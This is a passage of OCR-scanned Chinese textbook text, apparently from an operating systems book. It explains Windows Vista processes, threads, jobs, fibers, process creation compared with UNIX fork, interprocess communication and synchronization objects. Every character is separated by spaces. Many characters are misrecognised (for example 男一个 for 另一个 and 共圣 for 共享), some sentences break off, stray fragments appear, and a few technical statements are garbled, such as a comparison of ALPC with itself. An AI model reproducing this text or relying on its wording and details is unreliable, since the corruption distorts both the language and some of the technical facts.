多 服务 是 运行 在 同一 进程 (svchost.exe〉 中 的 。Windows 也 利用 这 种 方 
式 来 处 理 自己 启动 时 间 的 服务 ， 以 减少 启动 系统 所 需 的 时 间 。 服 务 可 以 
合并 到 相同 的 进程 ， 只 要 它们 能 安全 地 使 用 相同 的 安全 凭据 。 





在 每 个 共享 的 服务 进程 内 ,个体 服 务 是 以 DLL 的 形式 加 载 的。 它们 
通常 利用 Win32 的 线程 池 的 功能 来 共 圣 一 个 进程 池 ， 这 样 对 于 所 有 的 服 
务 ， 


只 需要 运行 最 小 数目 的 线程 。 














服务 是 系统 中 和 常见 的 安全 漏洞 的 来 源 ， 因 为 它们 是 经 常 是 可 以 远程 
访问 的 《取决 于 TCP/IP 防 火 墙 和 IP 安 全 设置 ) ， 且 不 是 所 有 程序 员 都 是 
足够 仔细 的 ， 他 们 很 可 能 没有 验证 通过 RPC 传 递 的 参数 和 缓冲 区 。 


11.4 Windows Vista 中 的 进程 和 线程 





Windows 具 有 大 量 的 管理 CPU 和 资源 分 组 的 概念 。 以 下 各 节 中 ， 我 
们 将 检查 这 些 有 关 的 Win32 API 调 用 的 讨论 ， 并 介绍 它们 是 如 何 实现 
的 。 





11.41 基本 概念 





在 Windows Vista 中 的 进程 是 程序 的 容器 。 它 们 持 有 的 虚拟 地 址 空 
间 ， 以 及 指向 内 核 态 的 对 象 的 线程 的 句柄 。 作 为 线程 的 容器 ， 它 们 提供 
线程 执行 所 需要 的 公共 资源 ， 例 如 配额 结构 的 指针 、 共 享 的 令 牌 对 象 以 
及 用 来 初始 化 线程 的 默认 参数 一 一 包括 优先 次 序 和 调度 类 。 每 个 进程 都 
有 用 户 态 系统 数据 ， 称 为 PEB 〈 进 程 环境 块 ) 。PEB 包 括 已 加 载 的 模块 
(如 EXE 和 DLL) 列表 ， 包 含 环 境 字符 串 的 内 存 、 当 前 的 工作 目录 和 管 
理 进程 堆 的 数据 一 一 以 及 很 多 随 着 时 间 的 推移 已 添加 的 Win32 cruft。 











线程 是 在 Windows 中 调度 CPU 的 内 核 抽 象 。 优 先 级 是 基于 进程 中 包 
含 的 优先 级 值 来 为 每 个 线程 分 配 的。 线程 也 可 以 通过 灯 和 处 理 只 在 某 些 
处 理 堪 上 运行 。 这 有 助 于 显 式 分 发 多 处 理 需 上 运行 的 并 发 程序 的 工作 。 
每 个 线程 部 有 两 个 单独 调用 堆栈 ， 一 个 在 用 户 态 执行 ， 男 一 个 内 核 态 执 
行 。 也 有 TEB 线程 环境 块 ) 使 用 户 态 数据 指定 到 线程 ， 包 括 每 个 线程 


存储 区 《线程 本 地 存储 区 ) 和 Win32 字 段 、 语 言 和 文化 本 地 化 以 及 其 他 
专门 的 字段 ， 这 些 字段 都 被 各 种 不 同 的 功能 添加 上 了 。 


除了 PEB 与 TEB 外 ， 还 有 男 一 个 数据 结构 ， 内 核 态 与 每 个 进程 共 圣 








只 能 读 。 它 包含 了 一 系列 的 由 内 核 维护 的 值 ， 如 各 种 时 间 、 版 本 信息 、 
物理 内 存 和 大 量 的 被 用 户 态 组 件 共享 的 标志 ， 如 COM、 终 端 服务 和 调 
试 程序 。 有 关 使 用 此 只 读 的 共享 页 ， 纯 粹 是 出 于 性 能 优化 的 目的 ， 因 为 
值 也 能 获得 通过 系统 调用 到 内 核 态 获得 。 但 系统 调用 是 比 一 个 内 存 访问 
代价 大 很 多 ， 所 以 对 于 大 量 由 系统 维护 的 字段 ， 例 如 时 间 ， 这 样 的 处 理 
就 很 有 意义 。 其 他 字段 ， 如 当前 时 区 更 改 很 少 ， 但 依赖 于 这 些 字段 的 代 
码 必 须 碍 询 它们 往往 只 是 看 它们 是 否 已 更 改 。 


1. 进 程 


进程 创建 是 从 段 对 象 创 建 的 ， 每 个 段 对 象 描述 了 磁盘 上 荣 个 文件 的 
一 个 内 存 对 象 。 在 创建 一 个 过 程 时 创建 的 进程 将 接收 一 个 句柄 ， 这 个 名 
柄 允许 它 通 过 映射 段 、 分 配 虚拟 内 存 、 写 参数 和 环境 变量 数据 、 复 制 文 
件 描 述 符 到 它 的 句柄 表 、 创 建 线程 来 修改 新 的 进程 。 这 非常 不 同 于 在 
UNIX 中 创建 进程 的 ， 反 映 了 Windows 与 UNIX 初 始 设计 目标 系统 的 不 
同 。 





正如 11.1 节 所 描述 ，UNIX 是 为 16 位 单 处 理 器 系统 设计 的 ， 而 这 样 


的 单 处 理 嚣 系统 是 用 于 在 进程 之 间 交 换 共 享 内 存 的 。 这 样 的 系统 中 ， 进 
程 作为 并 发 的 单元 ， 并 且 使 用 像 fork 这 样 的 操作 来 创建 进程 是 一 个 天 才 
般 的 设计 主意 。 如 果 要 在 很 小 的 内 存 中 运行 一 个 新 的 进程 ， 并 且 没 有 硬 
件 文 持 的 虚拟 内 存 ， 那 么 在 内 存 中 的 进程 就 不 得 不 换 出 到 磁盘 以 创建 空 
间 。UNIX 操 作 系 统 《〈 一 种 多 用 户 的 计算 机 操作 系统 ) 最 初 仅仅 通过 简 
单 的 父 进程 交换 技术 和 传递 其 物理 内 存 给 它 的 子 进程 来 实现 fork。 这 种 
操作 和 运行 几乎 是 没有 代价 的 。 


相 比 之 下 ， 在 Cutler 小 组 开发 NT 的 时 代 ， 当 时 的 硬件 环境 是 32 位 多 
处 理 器 系统 与 虚拟 内 存 硬 件 共享 1 一 16 兆 字 节 的 物理 内 存 。 多 处 理 器 为 
部 分 程序 并 行 运行 提供 了 可 能 ， 因 此 NT 使 用 进程 作为 共享 内 存 和 数据 
资源 的 容器 ， 并 使 用 线程 作为 并 发 调度 单元 。 


当然 ， 随 后 几 年 里 的 系统 就 完全 不 同 于 这 些 环境 了 。 例 如 拥有 64 位 
地 址 空间 并 且 一 个 芯片 上 集成 十 儿 个 (乃至 数 百 个 ) CPU 内 核 ， 存 储 体 
系 结构 中 若干 GB 大 小 的 物理 内 存 以 及 闪存 设备 和 其 他 非 易 失 存 储存 设 
备 的 加 入 ， 更 广泛 虚拟 化 、 普 适 网 络 的 支持 ， 以 及 例如 事件 型 内 存 
(transactional memory) 这 类 同步 技术 的 创新 。Windows 和 UNIX 操 作 系 
统 无 疑 将 继续 适应 现实 中 新 的 硬件 ， 但 我 们 更 感 兴趣 的 是 ， 会 有 哪些 新 
的 操作 系统 会 基于 新 硬件 而 被 特别 设计 出 来 。 





2. 作 业 和 纤 程 


Windows 可 以 将 进程 分 组 为 作业 ， 但 作业 抽象 并 不 足够 通用 。 原 因 
是 其 专 为 限制 分 组 进程 所 包含 的 线程 而 设计 ， 如 通过 限制 共 圣 资源 配 
额 、 强 制 执行 受 限 令 牌 (restricted token) 来 阻止 线程 访问 许多 系统 对 
象 。 作 业 最 重要 的 特性 是 一 旦 一 个 进程 在 作业 中 ， 该 进程 创建 的 进程 、 
线程 也 在 该 作业 中 ， 没 有 特例 。 惑 像 它 的 名 字 所 示 ， 作 业 是 为 类 似 批 处 
理 环 境 而 非 交 互 式 计算 环境 而 设计 的 。 











一 个 进程 最 多 属于 一 个 作业 。 这 是 有 道理 的 ， 因 为 很 难 去 定义 一 个 
进程 必须 服从 多 个 共 主 配额 或 限制 令 牌 的 情况 。 但 这 也 意味 着 ， 如 果 有 
多 个 系统 服务 党 试 使 用 作业 来 管理 同一 部 分 进程 ， 则 会 产生 冲突 。 例 
如 ， 如 果 进 程 肯 和 完 将 自己 加 入 到 了 一 个 作业 中 ， 或 者 一 个 安全 的 工具 已 
经 将 其 加 入 了 带 有 一 定 受 限 令 牌 的 作业 中 ， 则 当 一 个 管理 工具 试图 将 进 
程 加 入 其 他 作业 以 限制 其 资源 时 将 会 失败 。 因 此 在 Windows 中 很 少 使 用 
作业 。 


图 11-24 显 示 了 了 作业、 进程、 线程 和 纤 程 之 间 的 关系 。 作 业 包 含 进 
程 ， 进 程 包含 线程 ， 但 是 线程 不 包含 纤 程 。 线 程 与 纤 程 通常 是 多 对 多 的 
关系 。 
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图 11-24 人 作业、 进程、 线程 、 纤 程 之 间 的 关系 。 作 业 和 纤 程 是 可 选 
的 ; 并 不 是 所 有 的 进程 都 在 作业 中 或 者 包含 纤 程 


纤 程 通过 分 配 栈 与 用 来 存储 纤 程 相关 寄存 器 和 数据 的 用 户 态 纤 程 数 
据 结 构 来 创建 。 线 程 被 转换 为 纤 程 ， 但 纤 程 也 可 以 独立 于 线程 创建 。 这 
些 新 创建 的 纤 程 直到 一 个 已 经 运行 的 纤 程 显 式 地 调用 SwitchToFiber 函 数 
才 开 始 执 行 。 由 于 线程 可 以 尝试 切换 到 一 个 已 经 在 运行 的 纤 程 ， 因 此 ， 
程序 员 必 须 使 用 同步 机 制 以 防止 这 种 情况 发 生 。 











纤 程 的 主要 优点 在 于 纤 程 之 间 的 切换 开销 要 远 远 小 于 线程 之 间 的 切 
换 。 线 程 切换 需要 进出 内 核 而 纤 程 切换 仅 需 要 保存 和 恢复 几 个 寄存 器 


尽管 纤 程 是 协同 调度 的 ， 如 果 有 多 个 线程 调度 纤 程 ， 则 需要 非 芝 小 
心地 通过 同步 机 制 以 确保 纤 程 之 间 不 会 互相 和 干扰。 为 了 简化 线程 和 纤 程 
之 间 的 交互 ， 通 第 创建 和 能 运行 它们 的 内 核 数 目 一 样 多 的 线程 ， 并 且 让 
每 个 线程 只 能 运行 在 一 套 可 用 的 处 理 器 甚至 只 是 一 个 单一 的 处 理 器 上 。 











每 个 线程 可 以 运行 一 个 独立 的 纤 程 子 集 ， 从 而 建立 起 线程 和 纤 程 之 
间 一 对 多 的 关系 来 简化 同步 。 即 便 如 此 ， 使 用 纤 程 仍然 有 许多 困难 。 大 
多 数 的 Win32 库 是 完全 不 识别 纤 程 的 ， 并 且 尝 试 像 使 用 线程 一 样 使 用 纤 
程 的 应 用 会 遇 到 各 种 错误 。 由 于 内 核 不 识别 纤 程 ， 当 一 个 纤 程 进入 内 核 
时 ， 其 所 属 线程 可 能 阻塞 。 此 时 处 理 器 会 调度 任意 其 他 线程 ， 导 致 该 线 
程 的 其 他 纤 程 均 无 法 运行 。 因 此 纤 程 很 少 使 用 ， 除 非 从 其 他 系统 移植 那 
些 明 显 需要 纤 程 提供 功能 的 代码 。 图 11-25 总 结 了 上 面 提 到 的 这 些 抽 
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图 11-25 CPU 和 资源 管理 所 使 用 的 基本 概念 


3. 线 程 





通常 每 一 个 进程 是 由 一 个 线程 开始 的 ， 但 一 个 新 的 进程 也 可 以 动态 
创建 。 线 程 是 CPU 调度 的 基本 单位 ， 因 为 操作 系统 总 是 选择 一 个 线程 而 
不 是 进程 来 运行 。 因 此 ， 每 一 个 线程 有 一 个 调度 状态 《〈 惑 绪 态 、 运 行 








所 属 进 程 地 址 空间 中 的 开始 运行 地 址 的 win32 库 函数 动态 创建 。 


每 一 个 线程 均 有 一 个 线程 ID， 其 和 进程 ID 取 目 同一 空间 ， 因 此 单一 
的 ID 不 可 能 同时 被 一 个 线程 和 一 个 进程 使 用 。 进 程 和 线程 的 ID 是 4 的 倍 
数 ， 因 为 它们 实际 上 是 通过 用 于 分 配 卫 的 特殊 句柄 表 来 执行 分 配 的 。 该 
系统 复 用 了 如 图 11-18 和 图 11-19 所 示 的 可 扩展 句柄 管理 功能 。 句 柄 表 没 
有 对 象 的 引用 ， 但 使 用 指针 指 同 进 程 或 线程 ， 使 通过 ID 碍 找 一 个 进程 或 
线程 非常 有 效 。 最 新 版 本 的 Windows 采 用 先进 先 出 顺序 管理 空间 句柄 列 
表 ， 使 ID 无 法 马上 重复 使 用 。ID 马 上 被 重复 使 用 的 问题 将 在 本 章 的 最 后 


问题 部 分 再 讨论 。 





线程 通常 在 用 户 态 运 行 ， 但 是 当 它 进行 一 个 系统 调用 时 ， 就 切换 到 
内 核 态 ， 并 以 其 在 用 户 态 下 相同 的 属性 以 及 限制 继续 运行 。 每 个 线程 有 
两 个 堆栈 ， 一 个 在 用 户 态 使 用 ， 而 另 一 个 在 内 核 态 使 用 。 任 何 时 候 当 一 
个 线程 进入 内 核 态 ， 其 切换 到 内 核 态 堆栈 。 用 户 态 寄存 器 的 值 以 上 下 文 
(context) 数据 结构 的 形式 保存 在 该 内 核 态 堆栈 的 部 。 因 为 只 有 进入 内 
核 态 的 用 户 态 线程 才 会 停止 运行 ， 当 它 没 有 运行 时 该 上 下 文 数据 结构 中 
总 是 包括 了 其 寄存 器 状态 。 任 何 拥有 线程 句柄 的 进程 可 以 查看 并 修改 这 
个 上 下 文 数据 结构 。 














线程 通常 使 用 其 所 属 进程 的 访问 令 牌 运行 ， 但 在 茶 些 涉及 客户 机 / 
服务 器 计算 的 情况 下 ， 一 个 服务 占线 程 可 能 需要 模拟 其 客户 端 ， 此 时 需 
要 使 用 基于 客户 端 令 牌 的 临时 令 牌 标识 来 执行 客户 的 操作 。“《 一 般 来 说 





服务 器 不 能 使 用 客户 端的 实际 令 牌 ， 因 为 客户 端 和 服务 器 可 运行 于 不 同 
的 系统 。) 


IO 处 理 也 经 疝 需 要 关注 线程 。 当 执行 同步 JO 时 会 阻塞 线程 ， 并 且 
异步 IO 相 关 的 未 完成 的 MO 请 求 也 关联 到 线程 。 当 一 个 线程 完成 执行 ， 
它 可 以 退出 ， 此 时 任何 等 待 该 线程 的 VO 请 求 将 被 取消 。 当 进程 中 最 后 
一 个 活跃 线程 退出 时 ， 这 一 进程 将 终止。 


需要 注意 的 是 线程 是 一 个 调度 的 概念 ， 而 不 是 一 个 资源 所 有 权 的 概 
念 。 任 何 线程 可 以 访问 其 所 属 进 程 的 所 有 对 象 ， 只 需要 使 用 句柄 值 ， 并 
进行 合适 的 Win32 调 用 。 一 个 线程 并 不 会 因为 一 个 不 同 的 线程 创建 或 打 
开 了 一 个 对 象 而 无 法 访问 它 。 系 统 甚 至 没有 记录 和 古 哪 一 个 线程 创建 了 哪 
一 个 对 象 。 一 旦 一 个 对 象 句柄 已 经 在 进程 句柄 表 中 ， 任 何在 这 一 进程 中 
的 线程 均 可 使 用 它 ， 即 使 它 是 在 模拟 发 一 个 不 同 的 用 户 。 


正如 前 面 所 述 ， 除 了 用 户 态 运 行 的 正常 线程 ，Windows 有 许多 只 能 
运行 在 内 核 态 的 系统 线程 ， 而 其 与 任何 用 户 态 进程 都 没 有 联系 。 所 有 这 
一 类 型 的 系统 线程 运行 在 一 个 特殊 的 称 为 系统 进程 的 进程 中 。 该 进程 没 
有 用 户 态 地 址 空间 ， 其 提供 了 线程 在 不 代表 某 一 特定 用 户 态 进程 执行 时 
的 环境 。 当 学 到 内 存 管 理 的 时 候 ， 我 们 将 讨论 这 样 的 一 些 线程 。 这 些 线 
程 有 的 执行 管理 任务 ， 例 如 写 脏 页 面 到 磁盘 上 ， 而 其 他 形成 了 工作 线程 
池 ， 来 分 配 并 执行 部 件 或 驱动 程序 需要 系统 进程 执行 的 工作 。 











11.4.2 作业、 进程 、 线 程 和 纤 程 管理 API 调 用 


新 的 进程 是 由 Win32 API 函 数 CreatProcess 创 建 的 。 这 个 函数 有 许多 
参数 和 大 量 的 选项 ， 包 括 被 执行 文件 的 名 称 ， 命 令 行 字 符 串 (未 解析 )》 
和 一 个 指向 环境 字符 串 的 指针 。 其 中 也 包括 了 控制 诸多 细节 的 令 牌 和 数 
值 ， 这 些 细 节 包 括 了 如 何 配置 进程 和 第 一 个 线程 的 安全 性 ， 调 试 配 置 和 
调度 优先 级 等 。 其 中 一 个 令 牌 指定 创建 者 打开 的 句柄 是 否 被 传递 到 新 的 
进程 中 。 该 函数 还 接受 当前 新 进程 的 工作 目录 和 可 选 的 带 有 关于 此 进程 
使 用 GUI 窗口 的 相关 信息 的 数据 结构 。Win32 对 新 进程 和 其 原始 线程 都 
返回 ID 和 句柄 ,而 非 只 为 新 进程 返回 一 个 ID 号 。 








大 量 的 参数 揭示 了 Windows 和 UNIX 在 进程 创建 的 开发 设计 上 的 诸 
多 的 不 同 之 处 。 


1) 寻 找 执行 程序 的 实际 搜索 路 径 隐 藏 在 Win32 的 库 代 码 里 ， 但 UNIX 
中 则 显 式 地 管理 该 信息 。 


2) 当 前 工作 目录 在 UNIX 操 作 系 统 里 是 一 个 内 核 态 的 概念 ， 但 是 在 
Windows 里 是 用 户 态 字符 串 。Windows 为 每 个 进程 都 打开 当前 目录 的 一 
个 句柄 ， 这 导致 了 和 UNIX 一 样 的 麻烦 : 除了 碰巧 工作 目录 是 跨 网 络 的 
情况 下 可 以 删除 它 ， 其 他 工作 目录 都 是 不 能 删除 的 。 








3)UNIX 解 析 命 令 行 ， 并 传递 参数 数组 ， 而 Win32 需 要 每 个 程序 自己 
解析 参数 。 其 结果 是 ， 不 同 的 程序 可 能 采用 不 一 致 的 方式 处 理 通配符 
《如 *.txt) 和 其 他 特殊 字符 。 








4 在 UNIX 中 ， 文 件 描 述 符 是 否 可 以 被 继承 是 句柄 的 一 个 属性 。 不 
过 在 Windows 中 ， 其 同时 是 句柄 和 进程 创建 参数 的 属性 。 


5)Win32 是 面 问 图 形 用 户 界 面 的， 因此 新 进程 能 直接 获得 其 窗口 信 
恩 ， 而 在 UNIX 中 ， 这 些 信息 是 通过 参数 传递 给 图 形 用 户 界 面 程序 的 。 


6)Windows 中 的 可 执行 代码 没有 SETUID 位 属性 ， 不 过 一 个 进程 也 
可 以 为 另 一 个 用 户 创 建 进程 ， 只 要 其 能 获得 该 用 户 的 信用 标识 。 











7)Windows 返 回 的 进程 、 线 程 句 柄 可 以 用 在 很 多 独立 的 方法 中 修改 
新 进程 /线程 ， 例 如 复制 句柄 、 在 新 进程 中 设置 环境 变量 等 。UNIX 则 只 
在 fork 和 exec 调 用 的 时 候 修 改 新 进程 。 








这 些 不 同 有 些 是 来 自 历史 原因 和 哲学 原因 。UNIX 的 设计 是 面向 命 
令 行 的 ， 而 不 是 像 windows 那 样 面 癌 图 形 用 户 界 面 的 。UNIX 的 用 户 相 
比 来 说 更 高 级 ， 同 时 也 懂得 像 PATH 环境 变量 的 概念 。Windows Vista 继 
承 了 很 多 MS-DOS 中 的 东西 。 


这 种 比较 也 有 点 偏 诺 ， 因 为 Win32 是 一 个 用 户 态 下 的 对 NT 本 地 进程 
执行 的 包 厂 器 ， 就 像 UNIX 下 的 系统 库 函 数 forkexec 的 封装 。 实 际 的 NT 


中 创建 进程 和 线程 的 系统 调用 NtCreateProcess 和 NtCreateThread 比 Win32 
版 本 简单 得 多 。NT 进 程 创 建 的 主要 参数 包括 代表 所 要 运行 的 程序 文件 
句柄 、 一 个 指定 新 进程 是 否 默认 继承 创建 者 句柄 的 标志 ， 以 及 有 关 安 全 
模型 的 相关 参数 。 由 于 用 户 态 下 的 代码 能 够 使 用 新 建 进程 的 句柄 能 对 新 
进程 的 虚拟 地 址 空间 进行 直接 的 操作 ， 所 有 关于 建立 环境 变量 、 创 建 初 
始 线程 的 细节 就 留 给 用 户 态 代码 来 解决 。 





为 了 支持 POSIX 子 系统 ， 本 地 进程 创建 有 一 个 选项 可 以 指定 ， 通 过 
拷贝 男 一 个 进程 的 虚拟 地 址 空间 来 创建 一 个 新 进程 ， 而 不 是 通过 映射 一 
个 新 程序 的 段 对 象 来 新 建 进程 。 这 种 方式 只 用 在 实现 POSIX 的 fork， 而 
不 是 Win32 的 。 





线程 创建 时 传 给 新 线程 的 参数 包括 : CPU 的 上 下 文 信息 《包括 栈 指 
针 和 起 始 指令 地 址 ) 、TEB 模 板 、 一 个 表示 线程 创建 后 马上 运行 或 以 挂 
起 状态 创建 《等 待 有 人 对 线程 句柄 调用 NtResumeThread 函 数 ) 的 标志 。 
用 户 态 下 的 栈 的 创建 以 及 argwargc 参 数 的 压 入 需要 由 用 户 态 下 的 代码 来 
解决 ， 必 须 对 进程 句柄 调用 本 地 NT 的 内 存 管理 API。 





在 Windows Vista 的 太行 版 中 ， 包 含 了 一 个 新 的 天 于 进程 操作 方面 的 
本 地 API， 这 个 接口 将 原来 许多 用 户 态 下 的 步骤 转移 到 了 内 核 态 下 执 
行 ， 同 时 将 进程 创建 与 起 始 线程 创建 绑 定 在 一 起 进行 。 作 这 种 改变 的 原 
因 是 支持 通过 进程 划分 信任 边界 。 一 般 来 说 ， 所 有 用 户 创建 的 进程 被 同 
等 信任 ， 由 用 户 决 定 信 任 边界 在 哪里 。 在 Windows Vista 中 的 这 个 改变 ， 











允许 进程 也 可 以 提供 信任 边界 ， 但 是 这 意味 着 对 于 新 进程 句柄 来 说 ， 创 
建 者 进程 没有 足够 的 权利 在 用 户 态 下 实现 进程 创建 的 细节 。 





1. 进 程 间 通信 





线程 间 可 以 通过 多 种 方式 进行 通信 ， 包 括 管道 、 命 名 管道 、 邮 件 
槽 、 套 接 字 、 远 程 过 程 调用 (RPC) 、 共 享 文件 等 。 管 道 有 两 种 模式 : 
字 节 管道 和 消息 管道 ， 可 以 在 创建 的 时 候选 择 。 字 节 模 式 的 管道 的 工作 
方式 与 UNIX 下 的 工作 方式 一 样 。 消 息 模式 的 管道 与 字 节 模式 的 管道 大 
致 相同 ， 但 会 维护 消息 边界 。 所 以 写 入 四 次 的 128 字 节 ， 读 出 来 也 是 四 
个 128 字 节 的 消息 ， 而 不 会 像 字 节 模 式 的 管道 一 样 读 出 的 是 一 个 512 字 
的 消息 。 命 名 管道 在 Vista 中 也 是 有 的 ， 跟 普通 的 管道 一 样 都 有 两 种 模 
式 ， 但 命名 管道 可 以 在 网 络 中 使 用 ， 而 普通 管道 只 能 在 单机 中 使 用 。 























邮件 槽 是 OS/2 操 作 系统 的 特性 ， 在 Windows 中 实现 只 是 为 了 兼容 
性 。 它 们 在 某 种 方式 上 跟 管 道 类 似 ， 但 不 完全 相同 。 首 先 ， 它 们 是 单 向 
的 ， 而 管道 则 是 双向 的 。 而 且 ， 它 们 能 够 在 网 络 中 使 用 但 不 提供 有 保证 
的 传输 。 最 后 ， 它 们 允许 发 送 进程 将 消息 广播 给 多 个 接收 者 而 不 仅仅 是 
一 个 接收 者 。 邮 件 槽 和 命名 管道 在 windows 中 都 是 以 文件 系统 的 形式 实 
现 ， 而 非 可 执行 的 功能 函数 。 这 样 做 就 可 以 通过 现 有 的 远程 文件 系统 协 
议 在 网 络 上 来 访问 到 它们 。 








套 接 字 也 与 管道 类 似 ， 只 不 过 它们 通常 连接 的 是 不 同 机 器 上 的 两 个 


进程 。 例 如 ， 一 个 进程 往 一 个 套 接 字 里 面 写 入 内 容 ， 远 程 机 器 上 的 为 外 
一 个 进程 从 这 个 套 接 字 中 读 出 来 。 套 接 字 同样 也 可 以 被 用 在 同一 台 机 器 
上 的 进程 通信 ， 但 是 因为 它们 比 管 道 带 来 了 更 大 的 开销 ， 所 以 一 般 来 说 
它们 只 被 用 于 网 络 环境 下 的 通信 。 套 接 字 原来 是 为 们 克利 UNIX 而 设计 
的 ， 它 的 实现 代码 很 多 都 是 可 用 的 ， 正 如 Windows 发 布 日 志 里 面 所 写 

的 ，Windows 代 码 中 使 用 了 一 些 伯克利 的 代码 及 数据 结构 。 








远程 过 程 调用 (RPC) 是 一 种 进程 A 命令 进程 B 调 用 进程 B 地 址 空间 
中 的 一 个 函数 ， 然 后 将 执行 结果 返回 给 进程 A 的 方式 。 在 这 个 过 程 中 对 
参数 的 限制 很 多 。 例 如 ， 如 果 传 递 的 是 个 指针 ， 那 么 对 于 进程 B 来 说 这 
个 指针 毫 无 意义 ， 因 此 必须 把 数据 结构 打包 起 来 然后 以 进程 无 关 的 方式 
传输 。 实 现 RPC 的 时 候 ， 通 常 是 把 它 作为 传输 层 之 上 的 抽象 层 来 实现 。 
例如 对 于 Windows 来 说 ， 可 以 通过 TCP/IP 套 接 字 、 命 名 管道 、ALPC 来 
进行 传输 。ALPC 的 全 称 是 高 级 本 地 过 程 调 用 (Advanced Local 
Procedure Call) ， 它 是 内 核 态 下 的 一 种 消息 传递 机 制 ， 为 同一 台 机 器 中 
的 进程 间 通 信 作 了 优化 ， 但 不 支持 网 络 间 通信 。 基 本 的 设计 思想 是 可 以 
发 送 有 回复 的 消 有 息 ， 以 此 来 实现 一 个 轻 量 级 的 RPC 版 本 ， 提 供 比 ALPC 
更 丰富 的 特性 。ALPC 的 实现 是 通过 拷贝 参数 以 及 基于 消息 大 小 的 临时 
共享 内 存 分 配 。 




















最 后 ， 进 程 间 可 以 共享 对 象 ， 如 段 对 象 。 段 对 象 可 以 同时 被 映射 到 
多 个 进程 的 虚拟 地 址 空间 中 ， 一 个 进程 执行 了 写 操作 之 后 ， 其 他 进程 可 


以 也 可 以 看 见 这 个 写 操 作 。 通 过 这 个 机 制 ， 在 生产 者 消费 者 问题 中 用 到 
的 共享 缓冲 区 束 可 以 轻松 地 实现 。 


2 同步 


进程 间 也 可 以 使 用 多 种 形式 的 同步 对 象 。 就 像 Windows Vista 中 提供 
了 多 种 形式 的 进程 间 通 信 机 制 一 样 ，Vista 也 提供 了 多 种 形式 的 同步 机 
制 ， 包 括 信 号 量 、 互 斥 量 、 临 界 区 和 事件 。 所 有 的 这 些 机 制 只 在 线程 上 
工作 ， 而 非 进程 。 所 以 当 一 个 线程 由 于 一 个 信号 量 而 阻塞 时 ， 同 一 个 进 
程 的 其 他 线程 《如 果 有 的 话 ) 会 继续 运行 而 并 不 会 被 影响 。 





使 用 Win32 的 API 函 数 CreateSemaphore 可 以 创建 一 个 信号 量 ， 可 以 
将 它 初始 化 为 一 个 给 定 的 值 ， 同 时 也 可 以 指定 最 大 值 。 信 和 号 量 是 一 个 内 
核 态 对 象 ， 因 此 拥有 安全 描述 符 和 句柄 。 信 和 号 量 的 句柄 可 以 通过 使 用 
DuplicateHandler 来 进行 复制 ， 然 后 传递 给 其 他 进程 使 得 多 个 进程 可 以 通 
过 相同 的 信号 量 来 进行 同步 。 在 win32 的 名 字 空 间 中 一 个 信号 量 也 可 以 
被 命名 ， 可 以 拥有 一 个 ACL 集 合 来 保护 它 。 有 些 时 候 通 过 名 字 来 共享 信 
号 量 比 通过 拷贝 句柄 更 合适 














对 up 和 down 的 调用 也 是 有 的 ， 只 不 过 它们 的 函数 名 看 起 来 比较 奇 
怪 : ReleaseSemaphore (up) 和 WaitForSingleObject (down) 。 可 以 给 
WaitForSingleObject 一 个 超时 时 间 ， 使 得 尽管 此 时 信和 号 量 仍然 是 0， 调 用 
它 的 线程 仍然 可 以 被 释放 尽管 定时 器 重新 引入 了 竞 态 


WaitForSingleObject 和 WaitForMultipleObject 是 将 在 11.3 节 中 讨论 的 分 发 
者 对 象 的 常见 接口 。 尽 管 有 可 能 将 单个 对 象 的 API 封 装 成 看 起 来 更 加 像 
信和 号 量 的 名 字 ， 但 是 许多 线程 使 用 多 个 对 象 的 版 本 ， 这 些 对 象 可 能 是 各 
种 各 样 的 同步 对 象 ， 也 可 能 是 其 他 类 似 进程 或 线程 结束 、IO 结 束 、 消 
恩 到 达 套 接 字 和 端口 等 事件 。 




















互 斥 量 也 是 用 于 同步 的 内 核 态 对 象 ， 但 是 比 信 号 量 简单 ， 因 为 互 斥 
量 不 需要 计数 器 。 它 们 其 实 是 锁 ， 上 锁 的 函数 是 WaitForSingleObject， 
解锁 的 函数 是 ReleaseMutex。 就 像 信 号 量 句 柄 一 样 ， 互 斥 量 的 句柄 也 可 
以 复制 ， 并 且 在 进程 间 传 递 ， 从 而 不 同 进程 间 的 线程 可 以 访问 同一 个 互 
a 








fh 


第 三 种 同步 机 制 是 临界 区 ， 实 现 的 是 临界 区 的 概念 。 临 界 区 在 
Windows 中 与 互 斥 量 类 似 ， 但 是 临界 区 相对 于 主创 建 线 程 的 地 址 空间 来 
说 是 本 地 的 。 因 为 临界 区 不 是 内 核 态 的 对 象 ， 所 以 它们 没有 显 式 的 句柄 
或 安全 描述 符 ， 而 且 也 不 能 在 进程 间 传 递 。 上 锁 和 解锁 的 函数 分 别 是 
EnterCriticalSection 和 LeaveCriticalSection。 因 为 这 些 API 函 数 在 开始 的 
时 候 只 是 在 用 户 空 间 中 ， 只 有 当 需 要 阻塞 的 时 候 才 调用 内 核 函 数 ， 它 们 
比 互 斥 量 快 得 多 。 在 需要 的 时 候 ， 可 以 通过 合并 自 旋 锁 (在 多 处 理 器 
E) 和 内 核 同步 机 制 来 优化 临界 区 。 在 许多 应 用 中 ， 大 多 数 的 临界 区 几 
乎 不 会 被 竞争 或 者 只 被 锁 住 很 短 的 时 间 ， 以 至 于 没 必要 分 配 一 个 内 核 同 
步 对 象 ， 这 样 会 极 大 地 节省 内 核 内 存 。 








我 们 讨论 的 最 后 一 种 同步 机 制 叫 事件 ， 它 使 用 内 核 态 对 象 。 就 像 我 
们 前 面 描述 的 ， 有 两 类 的 事件 一 一 通知 事件 和 同步 事件 。 一 个 事件 的 状 
态 有 两 种 : 收 到 信号 和 没收 到 信号 。 一 个 线程 通过 调用 
WaitForSingleObject 来 等 待 一 个 事件 被 信号 通知 。 如 果 另 一 个 线程 通过 
SetEvent 给 事件 发 信号 ， 会 发 生 什 么 取决 于 这 个 事件 的 类 型 。 对 于 通知 
事件 来 说 ， 所 有 等 待 线 程 都 会 被 释 放 ， 并 且 事 件 保 持 在 set 状 态 ， 直 到 手 
工 调用 ResetEvent 进 行 清除 ， 对 于 同步 事件 来 说 ， 如 果 有 一 个 或 多 个 线 
程 在 等 待 ， 那 么 有 且 仅 有 一 个 线程 会 被 唤醒 并 且 事 件 被 清除 。 另 一 个 蔡 
换 的 操作 是 PulseEvent， 像 SetEvent 一 样 ， 除 了 在 没有 人 等 待 的 时 候 脉 冲 
会 丢失 ， 而 事件 也 被 清除 。 相 反 ， 如 果 调 用 SetEvent 时 没有 等 待 的 线 
程 ， 那 么 这 个 设置 动作 依然 会 起 作用 ， 被 设置 的 事件 处 于 被 信号 通知 的 
状态 ， 所 以 当 后 面 的 那个 线程 调用 等 待 事件 的 API 时 ， 这 个 线程 将 不 会 
等 待 而 直接 返回 。 

















